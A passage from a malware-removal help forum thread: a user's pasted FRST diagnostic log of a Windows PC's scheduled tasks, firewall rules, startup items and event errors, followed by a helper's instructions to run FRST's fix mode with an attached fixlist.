\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {63882D74-4B0D-4654-86EE-D96AE3948093} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {6563DB5C-54FD-4007-98A3-1F779956369C} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {6A73D90C-B17C-4761-8357-1A346F1A3327} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {6E4E297E-904A-4E8C-A1D8-E7015D9472FF} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation) Task: {6FE732AA-0ED1-40DA-92A4-F64A10E68D10} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] () Task: {74B79B52-5FD9-4C14-BAB0-205B4C4DD9F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {818B6E4F-B131-4DE5-AA3E-03329037D6B4} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation) Task: {82B3BF49-D8E5-44A0-99BB-744A644CF9B3} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2017-07-26] (AVG Technologies CZ, s.r.o.) Task: {856C1A0B-D1FE-414A-877F-40CC1A262C0F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {92BE7943-78D8-4C4B-883D-3B2AAF434323} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {93A65F06-EFE4-4570-9760-03851C229F92} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} - System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" Task: {9F33BB8D-EA5E-4178-A01D-049835D5EA82} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {A07E9AD8-DFAC-47D9-AB07-04E3E9CA4C84} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation) Task: {A1231E6E-3113-41DF-B107-2905830BF645} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-10-11] (Microsoft Corporation) Task: {A1D60D55-A6B8-401B-BC05-2938E02DF2F2} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe Task: {A32272C9-4C2E-40B3-9BC4-7837AAA94F46} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe Task: {B1450FE1-82E8-40F1-8F3F-5749E0F9E20E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {B339B57F-52A4-44A2-B3C0-AFE7668D7751} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe Task: {B75CC161-8539-4321-B7B7-BDBBDC184FCC} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-29] () Task: {BA7F3875-7416-4EF5-B045-A03824D3AFA2} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C11D840D-C170-4F9B-8C68-0CFA8D3BFBF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-10-25] (Adobe Systems Incorporated) Task: {C1913C94-0842-490C-B755-F95332E09ABA} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C4E8B14A-4159-4C58-BDAD-281DBBFC97E8} - System32\Tasks\Microsoft\Windows Defender\MpIdleTask => d:\program files\windows defender\MpCmdRun.exe Task: {C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} - \PCDoctorBackgroundMonitorTask -> No File <==== ATTENTION Task: {CE4EEC05-AE50-4266-B124-7496745958B2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {D163B177-E9E5-43D7-B1DE-32EEFF81AA9A} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-04-22] (Dell Inc.) Task: {DA5EBFDD-F0C4-44BB-802B-EC827B4A9BF5} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {DA9D1E83-01AA-4187-BDB9-6D13247DE477} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {DD892FCB-068E-4A07-AFA4-C8584CF611D9} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {FFD0BCF8-7926-4344-A2B0-908C275D350D} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Caret.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=fljalecfjciodhpcledpamjachpmelml ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Murder Files.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=ijfecbiladpinddbjfodaaiahggomhaf ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Pixlr Touch Up.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=jklljiahjgoglchglekebfljnmbaleig ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Solitaire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=lkbhppfbabandkdmgjmifahoabeodiep ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sunrise Calendar.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=mojepfklcankkmikonjlnidiooanmpbb ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WorkFlowy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=koegeopamaoljbmhnfjbclbocehhgmkm ==================== Loaded Modules (Whitelisted) ============== 2016-03-15 10:19 - 2017-11-10 06:37 - 008931496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll 2017-03-18 15:58 - 2017-03-18 15:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-03-18 15:59 - 2017-03-18 21:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:18750BD1 [145] ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "DisplayName"="Dell" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ErrorControl"="1" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ImagePath"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ObjectName"="LocalSystem" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Start"="2" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Type"="272" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "Application"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "AppParameters"="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\localhost -> localhost ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2015-08-13 13:46 - 000000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\Pictures\lighthouse.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\Services: RapportMgmtService => 2 MSCONFIG\Services: RtkAudioService => 2 MSCONFIG\Services: SftService => 2 MSCONFIG\Services: TuneUp.UtilitiesSvc => 2 HKLM\...\StartupApproved\StartupFolder: => "Install LastPass FF RunOnce.lnk" HKLM\...\StartupApproved\StartupFolder: => "Install LastPass IE RunOnce.lnk" HKLM\...\StartupApproved\Run: => "SecurityHealth" HKLM\...\StartupApproved\Run32: => "CanonQuickMenu" HKLM\...\StartupApproved\Run32: => "CanonSolutionMenuEx" HKLM\...\StartupApproved\Run32: => "DBAgent" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "USB3MON" HKLM\...\StartupApproved\Run32: => "vProt" HKLM\...\StartupApproved\Run32: => "Malwarebytes Anti-Exploit" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "GarminExpressTrayApp" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "Uploader" HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{7CF0B69C-0DF4-4E8D-A6D0-6DF63D0B1078}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{9497CDF5-9603-4872-82A5-93316B585EE7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D4EE236B-05CC-4705-ADEE-70E743A19AC5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{05FDCBFA-215A-4D4B-A73E-2AB2A29459BB}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{4D14B9BE-7542-4749-B117-E76E3718F94B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{DD007F03-6CFB-4FF3-855D-77C1CAA586E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{17259786-812F-437A-95AA-4348016A08BD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{A6A28A3D-5FEE-4082-BB98-15AC1C5B7D7D}] => (Allow) C:\Program Files (x86)\Laplink\PCmover\pcmover.exe FirewallRules: [{AC7706D0-A3B5-47C1-B042-A8187C6E147A}] => (Allow) LPort=8888 FirewallRules: [{863F6857-0276-49C5-B1E5-CFC6C75E1D42}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe FirewallRules: [{E1E8C3C4-1603-491E-9EE6-5D72E01B5238}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{52D8F604-C3D5-47E7-B367-10F9C7371B49}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{D226D9A4-6BA1-44B6-A9D6-D4BDE65858D9}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{1548C2C5-D5F3-42F1-9CD0-CCB29B1F8A25}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{A20652DE-EB50-4341-9C75-4F87A50AB71B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe FirewallRules: [{C27B36A2-3295-4928-B9AF-8A70F1B245E5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{CB2E633C-B6CF-41FD-A0ED-2097BCC10CF8}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{97104FE1-B253-4B66-94B8-34C61639F706}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{4C7BD61A-FC97-4D74-BCE1-B3A03553E670}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{28D86D11-A19B-4C4C-8C72-E8D90A3AEF4F}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe ==================== Restore Points ========================= 05-11-2017 16:29:34 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/10/2017 06:53:14 AM) (Source: SideBySide) (EventID: 35) (User: ) Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1. Component identity found in manifest does not match the identity of the component requested. Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Please use sxstrace.exe for detailed diagnosis. Error: (11/10/2017 06:32:54 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5 Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24 Exception code: 0xe0434352 Fault offset: 0x000eb872 Faulting process id: 0x47bc Faulting application start time: 0x01d35a16b6f0a3c9 Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: b656c1f8-1500-4bab-a1c5-1476cbf7d52d Faulting package full name: Faulting package-relative application ID: Error: (11/10/2017 06:32:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application: esu.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: System.IO.FileNotFoundException at Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61.MoveNext() at System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start[[Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61, ExpressSelfUpdater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null]](<UpdateDatacenterOverridesAsync>d__61 ByRef) at Garmin.Omt.Service.Shared.Overrides.UpdateDatacenterOverridesAsync(Boolean) at Garmin.Omt.Service.Shared.Overrides..cctor() Exception Info: System.TypeInitializationException at Garmin.Omt.Service.Shared.Overrides.get_OmtBaseUrl() at Garmin.Omt.Express.SelfUpdater.Program.RealMain() at Garmin.Omt.Express.SelfUpdater.Program.Main(System.String[]) Error: (11/10/2017 06:21:56 AM) (Source: COM) (EventID: 10031) (User: ) Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected Error: (11/09/2017 09:18:00 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code. Error: (11/09/2017 06:24:58 AM) (Source: SideBySide) (EventID: 35) (User: ) Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1. Component identity found in manifest does not match the identity of the component requested. Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Please use sxstrace.exe for detailed diagnosis. Error: (11/09/2017 04:01:55 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5 Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24 Exception code: 0xe0434352 Fault offset: 0x000eb872 Faulting process id: 0x3ec8 Faulting application start time: 0x01d3593962b899dd Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: 511a3a4c-a029-49df-ab08-3ec49f2fbd34 Faulting package full name: Faulting package-relative application ID: System errors: ============= Error: (11/10/2017 04:17:56 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY) Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF} Error: (11/10/2017 04:17:46 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (11/10/2017 04:16:22 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:16:22 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server: {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC) Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} CodeIntegrity: =================================== Date: 2017-11-10 16:13:01.346 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-04 08:01:02.085 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-30 14:59:34.980 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-30 00:33:27.890 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-25 14:37:10.029 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-13 17:40:05.033 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-06 12:40:27.330 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-06 12:35:32.027 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-06 12:22:27.398 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-01 19:06:23.678 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz Percentage of memory in use: 19% Total physical RAM: 8108.94 MB Available physical RAM: 6515.47 MB Total Virtual: 16300.94 MB Available Virtual: 15084.72 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:919.74 GB) (Free:802.87 GB) NTFS Drive e: () (Removable) (Total:15.02 GB) (Free:15.02 GB) FAT32 Drive f: (Seagate Slim Drive) (Fixed) (Total:465.76 GB) (Free:454.05 GB) NTFS Drive g: (KINGSTON) (Removable) (Total:14.89 GB) (Free:13.24 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 5641807B) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=11.7 GB) - (Type=27) Partition 3: (Not Active) - (Size=919.7 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 465.8 GB) (Disk ID: 19D43B3F) Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS) ======================================================== Disk: 2 (MBR Code: Windows XP) (Size: 14.9 GB) (Disk ID: C3072E18) Partition 1: (Active) - (Size=14.9 GB) - (Type=0C) Could not read MBR for disk 3. ==================== End of Addition.txt ============================ Link to post Share on other sites More sharing options...
Aura Posted November 11, 2017 ID:1181516 Share Posted November 11, 2017 Alright, follow the instructions below. Farbar Recovery Scan Tool (FRST) - Fix mode Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply. Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located) Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) Click on the Fix button On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad Copy and paste its content in your next reply fixlist.txt Link to post Share on other sites More sharing options...
